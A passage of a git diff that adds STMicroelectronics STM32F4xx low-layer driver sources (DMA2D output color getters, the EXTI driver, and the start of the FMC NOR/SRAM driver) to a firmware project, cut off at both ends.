DMA2D_ColorStruct->OutputGreen << 5U; + outred = DMA2D_ColorStruct->OutputRed << 10U; + outalpha = DMA2D_ColorStruct->OutputAlpha << 15U; + } + else /* ColorMode = LL_DMA2D_OUTPUT_MODE_ARGB4444 */ + { + outgreen = DMA2D_ColorStruct->OutputGreen << 4U; + outred = DMA2D_ColorStruct->OutputRed << 8U; + outalpha = DMA2D_ColorStruct->OutputAlpha << 12U; + } + LL_DMA2D_SetOutputColor(DMA2Dx, (outgreen | outred | DMA2D_ColorStruct->OutputBlue | outalpha)); +} + +/** + * @brief Return DMA2D output Blue color. + * @param DMA2Dx DMA2D Instance. + * @param ColorMode This parameter can be one of the following values: + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB8888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB565 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB1555 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB4444 + * @retval Output Blue color value between Min_Data=0 and Max_Data=0xFF + */ +uint32_t LL_DMA2D_GetOutputBlueColor(DMA2D_TypeDef *DMA2Dx, uint32_t ColorMode) +{ + uint32_t color; + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(DMA2Dx)); + assert_param(IS_LL_DMA2D_OCMODE(ColorMode)); + + /* DMA2D OCOLR register reading ------------------------------------------*/ + if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB8888) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFFU)); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_RGB888) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFFU)); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_RGB565) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0x1FU)); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB1555) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0x1FU)); + } + else /* ColorMode = LL_DMA2D_OUTPUT_MODE_ARGB4444 */ + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFU)); + } + + return color; +} + +/** + * @brief Return DMA2D output Green color. + * @param DMA2Dx DMA2D Instance. + * @param ColorMode This parameter can be one of the following values: + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB8888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB565 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB1555 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB4444 + * @retval Output Green color value between Min_Data=0 and Max_Data=0xFF + */ +uint32_t LL_DMA2D_GetOutputGreenColor(DMA2D_TypeDef *DMA2Dx, uint32_t ColorMode) +{ + uint32_t color; + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(DMA2Dx)); + assert_param(IS_LL_DMA2D_OCMODE(ColorMode)); + + /* DMA2D OCOLR register reading ------------------------------------------*/ + if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB8888) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFF00U) >> 8U); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_RGB888) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFF00U) >> 8U); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_RGB565) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0x7E0U) >> 5U); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB1555) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0x3E0U) >> 5U); + } + else /* ColorMode = LL_DMA2D_OUTPUT_MODE_ARGB4444 */ + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xF0U) >> 4U); + } + + return color; +} + +/** + * @brief Return DMA2D output Red color. + * @param DMA2Dx DMA2D Instance. + * @param ColorMode This parameter can be one of the following values: + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB8888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB565 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB1555 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB4444 + * @retval Output Red color value between Min_Data=0 and Max_Data=0xFF + */ +uint32_t LL_DMA2D_GetOutputRedColor(DMA2D_TypeDef *DMA2Dx, uint32_t ColorMode) +{ + uint32_t color; + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(DMA2Dx)); + assert_param(IS_LL_DMA2D_OCMODE(ColorMode)); + + /* DMA2D OCOLR register reading ------------------------------------------*/ + if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB8888) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFF0000U) >> 16U); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_RGB888) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFF0000U) >> 16U); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_RGB565) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xF800U) >> 11U); + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB1555) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0x7C00U) >> 10U); + } + else /* ColorMode = LL_DMA2D_OUTPUT_MODE_ARGB4444 */ + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xF00U) >> 8U); + } + + return color; +} + +/** + * @brief Return DMA2D output Alpha color. + * @param DMA2Dx DMA2D Instance. + * @param ColorMode This parameter can be one of the following values: + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB8888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB888 + * @arg @ref LL_DMA2D_OUTPUT_MODE_RGB565 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB1555 + * @arg @ref LL_DMA2D_OUTPUT_MODE_ARGB4444 + * @retval Output Alpha color value between Min_Data=0 and Max_Data=0xFF + */ +uint32_t LL_DMA2D_GetOutputAlphaColor(DMA2D_TypeDef *DMA2Dx, uint32_t ColorMode) +{ + uint32_t color; + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(DMA2Dx)); + assert_param(IS_LL_DMA2D_OCMODE(ColorMode)); + + /* DMA2D OCOLR register reading ------------------------------------------*/ + if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB8888) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xFF000000U) >> 24U); + } + else if ((ColorMode == LL_DMA2D_OUTPUT_MODE_RGB888) || (ColorMode == LL_DMA2D_OUTPUT_MODE_RGB565)) + { + color = 0x0U; + } + else if (ColorMode == LL_DMA2D_OUTPUT_MODE_ARGB1555) + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0x8000U) >> 15U); + } + else /* ColorMode = LL_DMA2D_OUTPUT_MODE_ARGB4444 */ + { + color = (uint32_t)(READ_BIT(DMA2Dx->OCOLR, 0xF000U) >> 12U); + } + + return color; +} + +/** + * @brief Configure DMA2D transfer size. + * @param DMA2Dx DMA2D Instance + * @param NbrOfLines Value between Min_Data=0 and Max_Data=0xFFFF + * @param NbrOfPixelsPerLines Value between Min_Data=0 and Max_Data=0x3FFF + * @retval None + */ +void LL_DMA2D_ConfigSize(DMA2D_TypeDef *DMA2Dx, uint32_t NbrOfLines, uint32_t NbrOfPixelsPerLines) +{ + MODIFY_REG(DMA2Dx->NLR, (DMA2D_NLR_PL | DMA2D_NLR_NL), \ + ((NbrOfPixelsPerLines << DMA2D_NLR_PL_Pos) | NbrOfLines)); +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined (DMA2D) */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ + diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_exti.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_exti.c new file mode 100644 index 000000000..31d70ac68 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_exti.c @@ -0,0 +1,214 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_exti.c + * @author MCD Application Team + * @brief EXTI LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_exti.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (EXTI) + +/** @defgroup EXTI_LL EXTI + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup EXTI_LL_Private_Macros + * @{ + */ + +#define IS_LL_EXTI_LINE_0_31(__VALUE__) (((__VALUE__) & ~LL_EXTI_LINE_ALL_0_31) == 0x00000000U) + +#define IS_LL_EXTI_MODE(__VALUE__) (((__VALUE__) == LL_EXTI_MODE_IT) \ + || ((__VALUE__) == LL_EXTI_MODE_EVENT) \ + || ((__VALUE__) == LL_EXTI_MODE_IT_EVENT)) + + +#define IS_LL_EXTI_TRIGGER(__VALUE__) (((__VALUE__) == LL_EXTI_TRIGGER_NONE) \ + || ((__VALUE__) == LL_EXTI_TRIGGER_RISING) \ + || ((__VALUE__) == LL_EXTI_TRIGGER_FALLING) \ + || ((__VALUE__) == LL_EXTI_TRIGGER_RISING_FALLING)) + +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup EXTI_LL_Exported_Functions + * @{ + */ + +/** @addtogroup EXTI_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize the EXTI registers to their default reset values. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: EXTI registers are de-initialized + * - ERROR: not applicable + */ +uint32_t LL_EXTI_DeInit(void) +{ + /* Interrupt mask register set to default reset values */ + LL_EXTI_WriteReg(IMR, 0x00000000U); + /* Event mask register set to default reset values */ + LL_EXTI_WriteReg(EMR, 0x00000000U); + /* Rising Trigger selection register set to default reset values */ + LL_EXTI_WriteReg(RTSR, 0x00000000U); + /* Falling Trigger selection register set to default reset values */ + LL_EXTI_WriteReg(FTSR, 0x00000000U); + /* Software interrupt event register set to default reset values */ + LL_EXTI_WriteReg(SWIER, 0x00000000U); + /* Pending register set to default reset values */ + LL_EXTI_WriteReg(PR, 0x00FFFFFFU); + + return SUCCESS; +} + +/** + * @brief Initialize the EXTI registers according to the specified parameters in EXTI_InitStruct. + * @param EXTI_InitStruct pointer to a @ref LL_EXTI_InitTypeDef structure. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: EXTI registers are initialized + * - ERROR: not applicable + */ +uint32_t LL_EXTI_Init(LL_EXTI_InitTypeDef *EXTI_InitStruct) +{ + ErrorStatus status = SUCCESS; + /* Check the parameters */ + assert_param(IS_LL_EXTI_LINE_0_31(EXTI_InitStruct->Line_0_31)); + assert_param(IS_FUNCTIONAL_STATE(EXTI_InitStruct->LineCommand)); + assert_param(IS_LL_EXTI_MODE(EXTI_InitStruct->Mode)); + + /* ENABLE LineCommand */ + if (EXTI_InitStruct->LineCommand != DISABLE) + { + assert_param(IS_LL_EXTI_TRIGGER(EXTI_InitStruct->Trigger)); + + /* Configure EXTI Lines in range from 0 to 31 */ + if (EXTI_InitStruct->Line_0_31 != LL_EXTI_LINE_NONE) + { + switch (EXTI_InitStruct->Mode) + { + case LL_EXTI_MODE_IT: + /* First Disable Event on provided Lines */ + LL_EXTI_DisableEvent_0_31(EXTI_InitStruct->Line_0_31); + /* Then Enable IT on provided Lines */ + LL_EXTI_EnableIT_0_31(EXTI_InitStruct->Line_0_31); + break; + case LL_EXTI_MODE_EVENT: + /* First Disable IT on provided Lines */ + LL_EXTI_DisableIT_0_31(EXTI_InitStruct->Line_0_31); + /* Then Enable Event on provided Lines */ + LL_EXTI_EnableEvent_0_31(EXTI_InitStruct->Line_0_31); + break; + case LL_EXTI_MODE_IT_EVENT: + /* Directly Enable IT & Event on provided Lines */ + LL_EXTI_EnableIT_0_31(EXTI_InitStruct->Line_0_31); + LL_EXTI_EnableEvent_0_31(EXTI_InitStruct->Line_0_31); + break; + default: + status = ERROR; + break; + } + if (EXTI_InitStruct->Trigger != LL_EXTI_TRIGGER_NONE) + { + switch (EXTI_InitStruct->Trigger) + { + case LL_EXTI_TRIGGER_RISING: + /* First Disable Falling Trigger on provided Lines */ + LL_EXTI_DisableFallingTrig_0_31(EXTI_InitStruct->Line_0_31); + /* Then Enable Rising Trigger on provided Lines */ + LL_EXTI_EnableRisingTrig_0_31(EXTI_InitStruct->Line_0_31); + break; + case LL_EXTI_TRIGGER_FALLING: + /* First Disable Rising Trigger on provided Lines */ + LL_EXTI_DisableRisingTrig_0_31(EXTI_InitStruct->Line_0_31); + /* Then Enable Falling Trigger on provided Lines */ + LL_EXTI_EnableFallingTrig_0_31(EXTI_InitStruct->Line_0_31); + break; + case LL_EXTI_TRIGGER_RISING_FALLING: + LL_EXTI_EnableRisingTrig_0_31(EXTI_InitStruct->Line_0_31); + LL_EXTI_EnableFallingTrig_0_31(EXTI_InitStruct->Line_0_31); + break; + default: + status = ERROR; + break; + } + } + } + } + /* DISABLE LineCommand */ + else + { + /* De-configure EXTI Lines in range from 0 to 31 */ + LL_EXTI_DisableIT_0_31(EXTI_InitStruct->Line_0_31); + LL_EXTI_DisableEvent_0_31(EXTI_InitStruct->Line_0_31); + } + return status; +} + +/** + * @brief Set each @ref LL_EXTI_InitTypeDef field to default value. + * @param EXTI_InitStruct Pointer to a @ref LL_EXTI_InitTypeDef structure. + * @retval None + */ +void LL_EXTI_StructInit(LL_EXTI_InitTypeDef *EXTI_InitStruct) +{ + EXTI_InitStruct->Line_0_31 = LL_EXTI_LINE_NONE; + EXTI_InitStruct->LineCommand = DISABLE; + EXTI_InitStruct->Mode = LL_EXTI_MODE_IT; + EXTI_InitStruct->Trigger = LL_EXTI_TRIGGER_FALLING; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined (EXTI) */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fmc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fmc.c new file mode 100644 index 000000000..2e4dadb32 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_fmc.c @@ -0,0 +1,1692 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_fmc.c + * @author MCD Application Team + * @brief FMC Low Layer HAL module driver. + * + * This file provides firmware functions to manage the following + * functionalities of the Flexible Memory Controller (FMC) peripheral memories: + * + Initialization/de-initialization functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### FMC peripheral features ##### + ============================================================================== + [..] The Flexible memory controller (FMC) includes three memory controllers: + (+) The NOR/PSRAM memory controller + (+) The NAND/PC Card memory controller + (+) The Synchronous DRAM (SDRAM) controller + + [..] The FMC functional block makes the interface with synchronous and asynchronous static + memories, SDRAM memories, and 16-bit PC memory cards. Its main purposes are: + (+) to translate AHB transactions into the appropriate external device protocol + (+) to meet the access time requirements of the external memory devices + + [..] All external memories share the addresses, data and control signals with the controller. + Each external device is accessed by means of a unique Chip Select. The FMC performs + only one access at a time to an external device. + The main features of the FMC controller are the following: + (+) Interface with static-memory mapped devices including: + (++) Static random access memory (SRAM) + (++) Read-only memory (ROM) + (++) NOR Flash memory/OneNAND Flash memory + (++) PSRAM (4 memory banks) + (++) 16-bit PC Card compatible devices + (++) Two banks of NAND Flash memory with ECC hardware to check up to 8 Kbytes of + data + (+) Interface with synchronous DRAM (SDRAM) memories + (+) Independent Chip Select control for each memory bank + (+) Independent configuration for each memory bank + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FMC_LL FMC Low Layer + * @brief FMC driver modules + * @{ + */ + +#if defined (HAL_SRAM_MODULE_ENABLED) || defined(HAL_NOR_MODULE_ENABLED) || defined(HAL_NAND_MODULE_ENABLED) || defined(HAL_PCCARD_MODULE_ENABLED) || defined(HAL_SDRAM_MODULE_ENABLED) + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup FMC_LL_Private_Functions + * @{ + */ + +/** @addtogroup FMC_LL_NORSRAM + * @brief NORSRAM Controller functions + * + @verbatim + ============================================================================== + ##### How to use NORSRAM device driver ##### + ============================================================================== + + [..] + This driver contains a set of APIs to interface with the FMC NORSRAM banks in order + to run the NORSRAM external devices. + + (+) FMC NORSRAM bank reset using the function FMC_NORSRAM_DeInit() + (+) FMC NORSRAM bank control configuration using the function FMC_NORSRAM_Init() + (+) FMC NORSRAM bank timing configuration using the function FMC_NORSRAM_Timing_Init() + (+) FMC NORSRAM bank extended timing configuration using the function + FMC_NORSRAM_Extended_Timing_Init() + (+) FMC NORSRAM bank enable/disable write operation using the functions + FMC_NORSRAM_WriteOperation_Enable()/FMC_NORSRAM_WriteOperation_Disable() + + +@endverbatim + * @{ + */ + +/** @addtogroup FMC_LL_NORSRAM_Private_Functions_Group1 + * @brief Initialization and Configuration functions + * + @verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FMC NORSRAM interface + (+) De-initialize the FMC NORSRAM interface + (+) Configure the FMC clock and associated GPIOs + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the FMC_NORSRAM device according to the specified + * control parameters in the FMC_NORSRAM_InitTypeDef + * @param Device Pointer to NORSRAM device instance + * @param Init Pointer to NORSRAM Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NORSRAM_Init(FMC_NORSRAM_TypeDef *Device, FMC_NORSRAM_InitTypeDef* Init) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FMC_NORSRAM_BANK(Init->NSBank)); + assert_param(IS_FMC_MUX(Init->DataAddressMux)); + assert_param(IS_FMC_MEMORY(Init->MemoryType)); + assert_param(IS_FMC_NORSRAM_MEMORY_WIDTH(Init->MemoryDataWidth)); + assert_param(IS_FMC_BURSTMODE(Init->BurstAccessMode)); + assert_param(IS_FMC_WAIT_POLARITY(Init->WaitSignalPolarity)); +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) + assert_param(IS_FMC_WRAP_MODE(Init->WrapMode)); +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx */ + assert_param(IS_FMC_WAIT_SIGNAL_ACTIVE(Init->WaitSignalActive)); + assert_param(IS_FMC_WRITE_OPERATION(Init->WriteOperation)); + assert_param(IS_FMC_WAITE_SIGNAL(Init->WaitSignal)); + assert_param(IS_FMC_EXTENDED_MODE(Init->ExtendedMode)); + assert_param(IS_FMC_ASYNWAIT(Init->AsynchronousWait)); + assert_param(IS_FMC_WRITE_BURST(Init->WriteBurst)); + assert_param(IS_FMC_CONTINOUS_CLOCK(Init->ContinuousClock)); + assert_param(IS_FMC_PAGESIZE(Init->PageSize)); +#if defined (STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + assert_param(IS_FMC_WRITE_FIFO(Init->WriteFifo)); +#endif /* STM32F446xx || STM32F469xx || STM32F479xx */ + + /* Get the BTCR register value */ + tmpr = Device->BTCR[Init->NSBank]; + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) + /* Clear MBKEN, MUXEN, MTYP, MWID, FACCEN, BURSTEN, WAITPOL, WRAPMOD, WAITCFG, WREN, + WAITEN, EXTMOD, ASYNCWAIT, CPSIZE, CBURSTRW and CCLKEN bits */ + tmpr &= ((uint32_t)~(FMC_BCR1_MBKEN | FMC_BCR1_MUXEN | FMC_BCR1_MTYP | \ + FMC_BCR1_MWID | FMC_BCR1_FACCEN | FMC_BCR1_BURSTEN | \ + FMC_BCR1_WAITPOL | FMC_BCR1_WRAPMOD | FMC_BCR1_WAITCFG | \ + FMC_BCR1_WREN | FMC_BCR1_WAITEN | FMC_BCR1_EXTMOD | \ + FMC_BCR1_ASYNCWAIT | FMC_BCR1_CPSIZE | FMC_BCR1_CBURSTRW | \ + FMC_BCR1_CCLKEN)); + + /* Set NORSRAM device control parameters */ + tmpr |= (uint32_t)(Init->DataAddressMux |\ + Init->MemoryType |\ + Init->MemoryDataWidth |\ + Init->BurstAccessMode |\ + Init->WaitSignalPolarity |\ + Init->WrapMode |\ + Init->WaitSignalActive |\ + Init->WriteOperation |\ + Init->WaitSignal |\ + Init->ExtendedMode |\ + Init->AsynchronousWait |\ + Init->PageSize |\ + Init->WriteBurst |\ + Init->ContinuousClock); +#else /* defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) */ + /* Clear MBKEN, MUXEN, MTYP, MWID, FACCEN, BURSTEN, WAITPOL, CPSIZE, WAITCFG, WREN, + WAITEN, EXTMOD, ASYNCWAIT, CBURSTRW, CCLKEN and WFDIS bits */ + tmpr &= ((uint32_t)~(FMC_BCR1_MBKEN | FMC_BCR1_MUXEN | FMC_BCR1_MTYP | \ + FMC_BCR1_MWID | FMC_BCR1_FACCEN | FMC_BCR1_BURSTEN | \ + FMC_BCR1_WAITPOL | FMC_BCR1_WAITCFG | FMC_BCR1_CPSIZE | \ + FMC_BCR1_WREN | FMC_BCR1_WAITEN | FMC_BCR1_EXTMOD | \ + FMC_BCR1_ASYNCWAIT | FMC_BCR1_CBURSTRW | FMC_BCR1_CCLKEN | \ + FMC_BCR1_WFDIS)); + + /* Set NORSRAM device control parameters */ + tmpr |= (uint32_t)(Init->DataAddressMux |\ + Init->MemoryType |\ + Init->MemoryDataWidth |\ + Init->BurstAccessMode |\ + Init->WaitSignalPolarity |\ + Init->WaitSignalActive |\ + Init->WriteOperation |\ + Init->WaitSignal |\ + Init->ExtendedMode |\ + Init->AsynchronousWait |\ + Init->WriteBurst |\ + Init->ContinuousClock |\ + Init->PageSize |\ + Init->WriteFifo); +#endif /* defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) */ + + if(Init->MemoryType == FMC_MEMORY_TYPE_NOR) + { + tmpr |= (uint32_t)FMC_NORSRAM_FLASH_ACCESS_ENABLE; + } + + Device->BTCR[Init->NSBank] = tmpr; + + /* Configure synchronous mode when Continuous clock is enabled for bank2..4 */ + if((Init->ContinuousClock == FMC_CONTINUOUS_CLOCK_SYNC_ASYNC) && (Init->NSBank != FMC_NORSRAM_BANK1)) + { + Device->BTCR[FMC_NORSRAM_BANK1] |= (uint32_t)(Init->ContinuousClock); + } + +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + if(Init->NSBank != FMC_NORSRAM_BANK1) + { + Device->BTCR[FMC_NORSRAM_BANK1] |= (uint32_t)(Init->WriteFifo); + } +#endif /* STM32F446xx || STM32F469xx || STM32F479xx */ + + return HAL_OK; +} + +/** + * @brief DeInitialize the FMC_NORSRAM peripheral + * @param Device Pointer to NORSRAM device instance + * @param ExDevice Pointer to NORSRAM extended mode device instance + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NORSRAM_DeInit(FMC_NORSRAM_TypeDef *Device, FMC_NORSRAM_EXTENDED_TypeDef *ExDevice, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FMC_NORSRAM_EXTENDED_DEVICE(ExDevice)); + assert_param(IS_FMC_NORSRAM_BANK(Bank)); + + /* Disable the FMC_NORSRAM device */ + __FMC_NORSRAM_DISABLE(Device, Bank); + + /* De-initialize the FMC_NORSRAM device */ + /* FMC_NORSRAM_BANK1 */ + if(Bank == FMC_NORSRAM_BANK1) + { + Device->BTCR[Bank] = 0x000030DBU; + } + /* FMC_NORSRAM_BANK2, FMC_NORSRAM_BANK3 or FMC_NORSRAM_BANK4 */ + else + { + Device->BTCR[Bank] = 0x000030D2U; + } + + Device->BTCR[Bank + 1U] = 0x0FFFFFFFU; + ExDevice->BWTR[Bank] = 0x0FFFFFFFU; + + return HAL_OK; +} + +/** + * @brief Initialize the FMC_NORSRAM Timing according to the specified + * parameters in the FMC_NORSRAM_TimingTypeDef + * @param Device Pointer to NORSRAM device instance + * @param Timing Pointer to NORSRAM Timing structure + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NORSRAM_Timing_Init(FMC_NORSRAM_TypeDef *Device, FMC_NORSRAM_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FMC_ADDRESS_SETUP_TIME(Timing->AddressSetupTime)); + assert_param(IS_FMC_ADDRESS_HOLD_TIME(Timing->AddressHoldTime)); + assert_param(IS_FMC_DATASETUP_TIME(Timing->DataSetupTime)); + assert_param(IS_FMC_TURNAROUND_TIME(Timing->BusTurnAroundDuration)); + assert_param(IS_FMC_CLK_DIV(Timing->CLKDivision)); + assert_param(IS_FMC_DATA_LATENCY(Timing->DataLatency)); + assert_param(IS_FMC_ACCESS_MODE(Timing->AccessMode)); + assert_param(IS_FMC_NORSRAM_BANK(Bank)); + + /* Get the BTCR register value */ + tmpr = Device->BTCR[Bank + 1U]; + + /* Clear ADDSET, ADDHLD, DATAST, BUSTURN, CLKDIV, DATLAT and ACCMOD bits */ + tmpr &= ((uint32_t)~(FMC_BTR1_ADDSET | FMC_BTR1_ADDHLD | FMC_BTR1_DATAST | \ + FMC_BTR1_BUSTURN | FMC_BTR1_CLKDIV | FMC_BTR1_DATLAT | \ + FMC_BTR1_ACCMOD)); + + /* Set FMC_NORSRAM device timing parameters */ + tmpr |= (uint32_t)(Timing->AddressSetupTime |\ + ((Timing->AddressHoldTime) << 4U) |\ + ((Timing->DataSetupTime) << 8U) |\ + ((Timing->BusTurnAroundDuration) << 16U) |\ + (((Timing->CLKDivision) - 1U) << 20U) |\ + (((Timing->DataLatency) - 2U) << 24U) |\ + (Timing->AccessMode)); + + Device->BTCR[Bank + 1U] = tmpr; + + /* Configure Clock division value (in NORSRAM bank 1) when continuous clock is enabled */ + if(HAL_IS_BIT_SET(Device->BTCR[FMC_NORSRAM_BANK1], FMC_BCR1_CCLKEN)) + { + tmpr = (uint32_t)(Device->BTCR[FMC_NORSRAM_BANK1 + 1U] & ~(0x0FU << 20U)); + tmpr |= (uint32_t)(((Timing->CLKDivision) - 1U) << 20U); + Device->BTCR[FMC_NORSRAM_BANK1 + 1U] = tmpr; + } + + return HAL_OK; +} + +/** + * @brief Initialize the FMC_NORSRAM Extended mode Timing according to the specified + * parameters in the FMC_NORSRAM_TimingTypeDef + * @param Device Pointer to NORSRAM device instance + * @param Timing Pointer to NORSRAM Timing structure + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FMC_NORSRAM_Extended_Timing_Init(FMC_NORSRAM_EXTENDED_TypeDef *Device, FMC_NORSRAM_TimingTypeDef *Timing, uint32_t Bank, uint32_t ExtendedMode) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FMC_EXTENDED_MODE(ExtendedMode)); + + /* Set NORSRAM device timing register for write configuration, if extended mode is used */ + if(ExtendedMode == FMC_EXTENDED_MODE_ENABLE) + { + /* Check the parameters */ + assert_param(IS_FMC_NORSRAM_EXTENDED_DEVICE(Device)); + assert_param(IS_FMC_ADDRESS_SETUP_TIME(Timing->AddressSetupTime)); + assert_param(IS_FMC_ADDRESS_HOLD_TIME(Timing->AddressHoldTime)); + assert_param(IS_FMC_DATASETUP_TIME(Timing->DataSetupTime)); + assert_param(IS_FMC_TURNAROUND_TIME(Timing->BusTurnAroundDuration)); + assert_param(IS_FMC_ACCESS_MODE(Timing->AccessMode)); + assert_param(IS_FMC_NORSRAM_BANK(Bank)); + + /* Get the BWTR register value */ + tmpr = Device->BWTR[Bank]; + + /* Clear 